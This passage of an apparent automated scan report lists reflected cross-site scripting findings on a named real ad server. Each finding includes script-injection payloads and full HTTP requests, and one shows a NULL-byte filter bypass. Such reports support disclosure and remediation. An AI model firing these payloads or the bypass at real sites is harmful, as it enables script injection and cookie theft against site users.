The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1716"><script>alert(1)</script>30cb0b28617 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=721344214313/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?d1716"><script>alert(1)</script>30cb0b28617=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:40 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 506 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e39e9"><script>alert(1)</script>8eb25010a64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hservere39e9"><script>alert(1)</script>8eb25010a64/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:42 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 507 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e59b1"><script>alert(1)</script>e96462b849 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randome59b1"><script>alert(1)</script>e96462b849=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:43 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 506 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.646. http://media.sensis.com.au/hserver/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d76"><script>alert(1)</script>21b0d6a3ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=811861793105/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?40d76"><script>alert(1)</script>21b0d6a3ad=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:41 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 509 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9f3a"><script>alert(1)</script>3b6857a647d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hservere9f3a"><script>alert(1)</script>3b6857a647d/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd03f420596=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:55 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 374 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f6bc"><script>alert(1)</script>2f3ddeb3f88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random2f6bc"><script>alert(1)</script>2f3ddeb3f88=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd03f420596=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:56 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 374 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.649. http://media.sensis.com.au/hserver/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71fa6"><script>alert(1)</script>6aa4a944a5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=849825301462/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373?71fa6"><script>alert(1)</script>6aa4a944a5e=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Edd03f420596=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:54 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 377 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1d4"><script>alert(1)</script>dd078b9bca2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver8a1d4"><script>alert(1)</script>dd078b9bca2/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/home/index.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:26 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 443 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9b7"><script>alert(1)</script>62373f1999b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random2a9b7"><script>alert(1)</script>62373f1999b=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/home/index.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:27 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 1510 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb8cc'-alert(1)-'84c68a85969 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hserver/acc_randomeb8cc'-alert(1)-'84c68a85969=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/home/index.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:29 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 1450 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.653. http://media.sensis.com.au/hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00fdc63</script><script>alert(1)</script>a98d3dceeb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdc63</script><script>alert(1)</script>a98d3dceeb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415?%00fdc63</script><script>alert(1)</script>a98d3dceeb7=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/home/index.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:24 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 1598 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.654. http://media.sensis.com.au/hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39870"><script>alert(1)</script>417f90cf5bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=855321738428/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=660x50/POSITION=BLW1/pageid=365717345415?39870"><script>alert(1)</script>417f90cf5bd=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/home/index.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:16 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 1558 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52b0"><script>alert(1)</script>b73d22e5bb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserverc52b0"><script>alert(1)</script>b73d22e5bb4/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:42 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 517 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c047"><script>alert(1)</script>1febf5f062e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random9c047"><script>alert(1)</script>1febf5f062e=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:43 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 517 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.657. http://media.sensis.com.au/hserver/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e17f7"><script>alert(1)</script>84778b7d10b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?e17f7"><script>alert(1)</script>84778b7d10b=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:41 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 520 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d7cf"><script>alert(1)</script>4810e0e86c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
